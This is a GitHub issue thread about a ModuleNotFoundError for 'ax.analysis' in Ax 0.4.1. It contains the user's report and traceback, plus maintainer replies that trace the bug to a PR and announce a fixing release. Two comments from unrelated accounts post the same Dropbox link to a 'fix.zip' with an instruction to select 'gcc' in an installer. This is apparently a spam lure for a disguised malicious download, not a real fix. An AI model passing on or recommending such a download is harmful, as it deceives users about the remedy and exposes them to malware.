### ISSUE TITLE
[Bug]: No module named 'ax.analysis'

### ISSUE THREAD

**Issue by greg-rezo** [facebook/Ax#2711]
### What happened?

I want to use `Scheduler` so I created my own Runner and Metric class as [instructed](https://github.com/facebook/Ax/blob/main/docs/storage.md#customizing).
When I import `RegistryBundle` with `from ax.storage.registry_bundle import RegistryBundle`, I run into a missing module exception. 

I see that the `analysis` directory path exists in github under the `0.4.1` tag but it's not getting installed either when I use the wheel or install from `git+ssh://git@github.com/facebook/Ax.git@0.4.1` somehow.

### Please provide a minimal, reproducible example of the unexpected behavior.

$ pip install "ax-platform[mysql]==0.4.1"

$ python -c "from ax.storage.registry_bundle import RegistryBundle"

### Please paste any relevant traceback/logs produced by the example provided.

```shell
Traceback (most recent call last)
/Users/gregfriedland/src/internal/ml/bin/run_hpo.py:19 in <module>
from ax.storage.registry_bundle import RegistryBundle
/Users/gregfriedland/src/.venv/lib/python3.10/site-packages/ax/storage/registry_bundle.py:24 in <module>
from ax.storage.sqa_store.decoder import Decoder
/Users/gregfriedland/src/.venv/lib/python3.10/site-packages/ax/storage/sqa_store/__init__.py:12 in <module>
from ax.storage.sqa_store.load import load_experiment as sqa_load
/Users/gregfriedland/src/.venv/lib/python3.10/site-packages/ax/storage/sqa_store/load.py:19 in <module>
from ax.storage.sqa_store.decoder import Decoder
/Users/gregfriedland/src/.venv/lib/python3.10/site-packages/ax/storage/sqa_store/decoder.py:19 in <module>
19 from ax.analysis.base_analysis import BaseAnalysis

ModuleNotFoundError: No module named 'ax.analysis'
```

### Ax Version

0.4.1

### Python Version

3.10.14

### Operating System

macos

### Code of Conduct

- [X] I agree to follow Ax's Code of Conduct

**Comment by Wanderx13** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."

**Comment by mgarrard** [comment]
Hi @greg-rezo, thanks for pointing this out. It looks like this can be traced back to this PR: https://github.com/facebook/Ax/pull/2644?fbclid=IwZXh0bgNhZW0CMTEAAR1SqhQpXkrIxzApiJrEyYY_ZsXN1Sm8TiRtzhD6EGNZuy8tcfD7bUMs_ws_aem_SypeeSP7R0iNLuufgKC1bA

If you want to rebase onto main to unblock that should work, but we'll get a fix in soon and i'll comment here when we do :)

**Comment by mgarrard** [comment]
Hi @greg-rezo just re-following up here, we need to cut a maintenance release of BoTorch before we can cut Ax, we're still working on getting that out, appreciate your patience

**Comment by mgarrard** [comment]
@greg-rezo we cut a new release today that resolves your issue, check out our release notes for additional changes included :)
